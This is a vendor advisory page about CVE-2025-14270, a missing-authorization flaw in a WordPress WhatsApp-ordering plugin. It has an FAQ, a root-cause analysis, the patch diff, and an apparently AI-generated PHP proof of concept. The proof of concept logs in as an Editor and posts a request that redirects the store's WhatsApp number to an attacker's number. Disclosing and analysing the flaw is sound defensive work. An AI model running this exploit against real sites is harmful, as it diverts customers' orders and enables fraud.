What is CVE-2025-14270?

CVE-2025-14270 is a vulnerability in the OneClick Chat to Order plugin for WordPress, affecting versions up to and including 1.0.9. It involves a missing authorization check that allows authenticated users with Editor-level access or higher to modify WhatsApp phone numbers used by the plugin.

How does this vulnerability work?

The vulnerability arises from the `wa_order_number_save_number_field` function, which lacks proper capability checks and nonce verification. This allows attackers to submit a POST request to save a WhatsApp phone number, potentially redirecting customer orders to a number controlled by the attacker.

Who is affected by this vulnerability?

Any WordPress site using the OneClick Chat to Order plugin version 1.0.9 or earlier is affected. Specifically, authenticated users with Editor-level permissions or higher can exploit this vulnerability to change WhatsApp phone numbers.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the OneClick Chat to Order plugin installed. If it is version 1.0.9 or earlier, your site is at risk. Additionally, review user roles and permissions to identify any accounts with Editor-level access or higher.

How can I fix this vulnerability?

The vulnerability is patched in version 1.1.0 of the OneClick Chat to Order plugin. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or manually download the patched version.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider temporarily restricting Editor-level access to the plugin settings. Additionally, monitor user activity for any unauthorized changes to WhatsApp phone numbers until the plugin can be updated.

What does a CVSS score of 2.7 indicate?

A CVSS score of 2.7 indicates a low severity vulnerability, suggesting a limited impact on the overall security of the site. However, it still poses a risk to the integrity of customer communications, which could lead to business logic issues.

What are the practical risks of this vulnerability?

The main risk is that an attacker could redirect customer orders and messages to their own WhatsApp number, leading to potential fraud and loss of customer trust. The integrity of the store’s communication channel is compromised, although the site itself is not directly compromised.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an authenticated attacker can log into a vulnerable WordPress site and submit a POST request to change the WhatsApp phone number. It shows the steps taken to authenticate and exploit the vulnerability without needing special permissions beyond Editor-level access.

What should I do if I suspect exploitation?

If you suspect that your site has been exploited, immediately review the WhatsApp phone numbers configured in the plugin settings. Change any unauthorized numbers and audit user accounts for suspicious activity. Consider restoring from a backup if necessary.

How can I stay informed about vulnerabilities?

To stay informed about vulnerabilities, regularly check the National Vulnerability Database (NVD) and subscribe to security newsletters related to WordPress plugins. Additionally, follow the plugin developers for announcements regarding security patches and updates.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14270: OneClick Chat to Order <= 1.0.9 – Missing Authorization to Authenticated (Editor+) Plugin Settings Update (oneclick-whatsapp-order)

CVE ID CVE-2025-14270

Plugin oneclick-whatsapp-order

Severity Low (CVSS 2.7)

CWE 862

Vulnerable Version 1.0.9

Patched Version 1.1.0

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14270:
This vulnerability is a missing authorization flaw in the OneClick Chat to Order WordPress plugin. The vulnerability affects the plugin’s WhatsApp phone number management functionality. Attackers with Editor-level permissions or higher can modify the plugin’s stored WhatsApp numbers, redirecting customer orders and communications to attacker-controlled numbers. The CVSS score of 2.7 reflects a low-severity integrity impact.

The root cause is the `wa_order_number_save_number_field` function in `/oneclick-whatsapp-order/includes/multiple-numbers.php`. The vulnerable version, up to 1.0.9, lacks capability checks and nonce verification. The function hooks into WordPress’s `save_post` action. It only performs basic checks for autosave, auto-draft status, and correct post type (`wa-order-numbers`). It does not verify if the user has the required administrative privileges (`manage_options`) to perform the update. The function directly processes the `wa_order_phone_number_input` POST parameter without a security nonce.

Exploitation requires an authenticated attacker with at least Editor-level access. The attacker would target the WordPress post editor for the custom `wa-order-numbers` post type. They would submit a POST request to save a post, including the `wa_order_phone_number_input` parameter set to a malicious phone number. The request would be sent to the standard WordPress post update handler. No special endpoint or action parameter is required, as the vulnerability lies within the generic `save_post` hook execution for this specific post type.

The patch, introduced in version 1.1.0, adds multiple security layers. First, it defines strict capability requirements (`manage_options`) for the custom post type in its registration arguments. Second, the `wa_order_number_save_number_field` and `wa_order_completion_validator` functions now include a nonce check for `wa_order_phonenumbers_metabox_process` and a capability check using `current_user_can(‘manage_options’)`. These changes ensure only administrators can perform the action and that the request originates from the intended plugin interface.

Successful exploitation allows an attacker to redirect all WhatsApp-based order inquiries and messages from the victim’s WooCommerce store to a phone number they control. This constitutes a business logic compromise, enabling order interception, customer data diversion, and potential fraud. The impact is limited to the integrity and confidentiality of the store’s communication channel, not direct site compromise.

Differential between vulnerable and patched code

Code Diff

--- a/oneclick-whatsapp-order/includes/multiple-numbers.php
+++ b/oneclick-whatsapp-order/includes/multiple-numbers.php
@@ -37,7 +37,25 @@
       'publicly_queryable' => false,
       'has_archive' => false,
       'rewrite' => array('slug' => 'waon', 'with_front' => false),
-      'supports' => array('title')
+      'supports' => array('title'),
+      'capability_type' => 'post',
+      'capabilities' => array(
+        'edit_post' => 'manage_options',
+        'read_post' => 'manage_options',
+        'delete_post' => 'manage_options',
+        'edit_posts' => 'manage_options',
+        'edit_others_posts' => 'manage_options',
+        'publish_posts' => 'manage_options',
+        'read_private_posts' => 'manage_options',
+        'delete_posts' => 'manage_options',
+        'delete_private_posts' => 'manage_options',
+        'delete_published_posts' => 'manage_options',
+        'delete_others_posts' => 'manage_options',
+        'edit_private_posts' => 'manage_options',
+        'edit_published_posts' => 'manage_options',
+        'create_posts' => 'manage_options',
+      ),
+      'map_meta_cap' => false,
     )
   );
 }
@@ -156,15 +174,27 @@
 add_action('save_post', 'wa_order_number_save_number_field', 10, 2);
 function wa_order_number_save_number_field($pid, $post)
 {
+  // Skip autosave, auto-draft, and non-WhatsApp number post types
   if ((defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) || $post->post_status == 'auto-draft' || $post->post_type != 'wa-order-numbers') {
     return;
   }
+
+  // Security: Verify nonce
+  if (!isset($_POST['wa_order_phonenumbers_metabox_process']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['wa_order_phonenumbers_metabox_process'])), 'wa_order_phonenumbers_metabox_nonce')) {
+    return;
+  }
+
+  // Security: Check user capability - only administrators can manage WhatsApp numbers
+  if (!current_user_can('manage_options')) {
+    return;
+  }
+
   // Check if the phone number input exists in the POST data
   if (isset($_POST['wa_order_phone_number_input'])) {
     $sanitized_phone = sanitize_text_field(wp_unslash($_POST['wa_order_phone_number_input']));
     update_post_meta($pid, 'wa_order_phone_number_input', $sanitized_phone);
   } else {
-    // If the phone number input is not set, you might want to delete the meta key or handle it accordingly
+    // If the phone number input is not set, delete the meta key
     delete_post_meta($pid, 'wa_order_phone_number_input');
   }
 }
@@ -172,9 +202,21 @@
 add_action('save_post', 'wa_order_completion_validator', 20, 2);
 function wa_order_completion_validator($pid, $post)
 {
+  // Skip autosave, auto-draft, and non-WhatsApp number post types
   if ((defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) || $post->post_status == 'auto-draft' || $post->post_type != 'wa-order-numbers') {
     return;
   }
+
+  // Security: Verify nonce
+  if (!isset($_POST['wa_order_phonenumbers_metabox_process']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['wa_order_phonenumbers_metabox_process'])), 'wa_order_phonenumbers_metabox_nonce')) {
+    return;
+  }
+
+  // Security: Check user capability - only administrators can manage WhatsApp numbers
+  if (!current_user_can('manage_options')) {
+    return;
+  }
+
   $wa_number = get_post_meta($pid, 'wa_order_phone_number_input', true);
   if (empty($wa_number) && (isset($_POST['publish']) || isset($_POST['save'])) && isset($_POST['post_status']) && sanitize_text_field(wp_unslash($_POST['post_status'])) == 'publish') {
     global $wpdb;
--- a/oneclick-whatsapp-order/whatsapp-order.php
+++ b/oneclick-whatsapp-order/whatsapp-order.php
@@ -8,7 +8,7 @@
  * Plugin Name:       OneClick Chat to Order
  * Plugin URI:        https://www.onlinestorekit.com/oneclick-chat-to-order/
  * Description:       Make it easy for your customers to order via WhatsApp chat through a single button click with detailing information about a product including custom message. OneClick Chat to Order button can be displayed on a single product page and as a floating button. GDPR-ready!
- * Version:           1.0.9
+ * Version:           1.1.0
  * Author:            Walter Pinem
  * Author URI:        https://walterpinem.com/
  * Developer:         Walter Pinem | Online Store Kit
@@ -23,7 +23,7 @@
  * Requires PHP:      7.4
  *
  * WC requires at least: 8.2
- * WC tested up to: 10.3.4
+ * WC tested up to: 10.4.0
  *
  * Copyright: © 2019 - 2025 Walter Pinem.
  * License: GNU General Public License v3.0

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14270 - OneClick Chat to Order <= 1.0.9 - Missing Authorization to Authenticated (Editor+) Plugin Settings Update
<?php
// Configure target WordPress site
$target_url = 'https://vulnerable-site.com';
// Configure attacker credentials (Editor or higher)
$username = 'attacker_editor';
$password = 'editor_password';
// Configure malicious WhatsApp number to set
$malicious_phone_number = '+15551234567';

// Step 1: Authenticate to WordPress and obtain cookies/nonce
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Create a new 'WhatsApp Number' post to get a valid post ID and nonce
// First, visit the post creation page for the 'wa-order-numbers' post type
$create_post_url = $target_url . '/wp-admin/post-new.php?post_type=wa-order-numbers';
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

// Extract the nonce from the page (simplified - real PoC would parse HTML)
// For demonstration, we assume we have a post ID from a previous creation.
// In a real attack, an attacker would list existing posts or create one.
$post_id = 123; // This would be the ID of an existing 'wa-order-numbers' post

// Step 3: Craft the exploit POST request to update the phone number meta field.
// The vulnerable function hooks into 'save_post'. We mimic the standard post update.
$update_post_url = $target_url . '/wp-admin/post.php';
$exploit_data = array(
    'post_ID' => $post_id,
    'post_type' => 'wa-order-numbers',
    'action' => 'editpost',
    'wa_order_phone_number_input' => $malicious_phone_number,
    'save' => 'Update',
    'post_status' => 'publish'
    // Note: The vulnerable version does NOT require the 'wa_order_phonenumbers_metabox_process' nonce.
);

curl_setopt($ch, CURLOPT_URL, $update_post_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);

// Check for success
if (strpos($response, 'Post updated.') !== false || curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) {
    echo "[+] Success! WhatsApp number likely updated to: $malicious_phone_numbern";
} else {
    echo "[-] Exploit may have failed. Check response.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-14270?
Overview of the vulnerability
CVE-2025-14270 is a vulnerability in the OneClick Chat to Order plugin for WordPress, affecting versions up to and including 1.0.9. It involves a missing authorization check that allows authenticated users with Editor-level access or higher to modify WhatsApp phone numbers used by the plugin.
How does this vulnerability work?
Mechanics of the exploitation
The vulnerability arises from the `wa_order_number_save_number_field` function, which lacks proper capability checks and nonce verification. This allows attackers to submit a POST request to save a WhatsApp phone number, potentially redirecting customer orders to a number controlled by the attacker.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the OneClick Chat to Order plugin version 1.0.9 or earlier is affected. Specifically, authenticated users with Editor-level permissions or higher can exploit this vulnerability to change WhatsApp phone numbers.
How can I check if my site is vulnerable?
Steps to verify vulnerability status
To check if your site is vulnerable, verify the version of the OneClick Chat to Order plugin installed. If it is version 1.0.9 or earlier, your site is at risk. Additionally, review user roles and permissions to identify any accounts with Editor-level access or higher.
How can I fix this vulnerability?
Updating the affected plugin
The vulnerability is patched in version 1.1.0 of the OneClick Chat to Order plugin. To fix the issue, update the plugin to the latest version through the WordPress admin dashboard or manually download the patched version.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider temporarily restricting Editor-level access to the plugin settings. Additionally, monitor user activity for any unauthorized changes to WhatsApp phone numbers until the plugin can be updated.
What does a CVSS score of 2.7 indicate?
Understanding the severity rating
A CVSS score of 2.7 indicates a low severity vulnerability, suggesting a limited impact on the overall security of the site. However, it still poses a risk to the integrity of customer communications, which could lead to business logic issues.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
The main risk is that an attacker could redirect customer orders and messages to their own WhatsApp number, leading to potential fraud and loss of customer trust. The integrity of the store’s communication channel is compromised, although the site itself is not directly compromised.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept illustrates how an authenticated attacker can log into a vulnerable WordPress site and submit a POST request to change the WhatsApp phone number. It shows the steps taken to authenticate and exploit the vulnerability without needing special permissions beyond Editor-level access.
What should I do if I suspect exploitation?
Response actions for suspected attacks
If you suspect that your site has been exploited, immediately review the WhatsApp phone numbers configured in the plugin settings. Change any unauthorized numbers and audit user accounts for suspicious activity. Consider restoring from a backup if necessary.
How can I stay informed about vulnerabilities?
Keeping up with security updates
To stay informed about vulnerabilities, regularly check the National Vulnerability Database (NVD) and subscribe to security newsletters related to WordPress plugins. Additionally, follow the plugin developers for announcements regarding security patches and updates.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations